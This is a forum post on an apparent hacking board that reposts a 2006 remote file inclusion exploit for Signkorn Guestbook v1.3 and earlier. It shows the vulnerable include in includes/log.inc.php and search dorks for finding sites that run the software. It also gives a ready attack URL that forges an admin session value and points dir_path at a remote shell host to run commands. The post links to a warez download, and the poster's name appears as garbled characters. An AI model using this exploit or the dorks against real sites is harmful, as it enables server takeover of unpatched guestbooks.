Signkorn Guestbook - hacking collection

Members Login

Post Info

TOPIC: Signkorn Guestbook

so9or

ÓÑíå ÓÝíÇä Èä ÚæÝ ÇáÛÇãÏí ááÌåÇÏ ÇáßÊÑæäí

Status: Offline

Posts: 632

Date: Sat Sep 23 21:44:23 2006

Signkorn Guestbook	Permalink

#============================================================================================== #Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://warez.gtasoft.ru/skripts/SignKorn.Guestbook.(SL).v1.1.PHP.NULL-DGT.zip # #Version : v1.3 & all versions bellow # #================================================================================================ # #Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2" # #================================================================================================ #Bug in : includes/log.inc.php # #Vlu Code : #-------------------------------- # if ($_SESSION['permission'] == "yes") { # # // ########### Admin Menu ############# # include($dir_path . '/includes/admin.menu.inc.php'); # #================================================================================================ # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/includes/log.inc.php?_SESSION[permission]=yes&dir_path=http://SHELLURL.COM?&cmd=id # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : CCtream - Cyper-worrier team # Special Thx To : Str0ke & simoo ================================================================================================== # milw0rm.com [2006-09-12] __________________

Page 1 of 1 sorted by

Add/remove tags to this thread

Tweet this page

Post to Digg

Post to Del.icio.us

Create your own FREE Forum
Report Abuse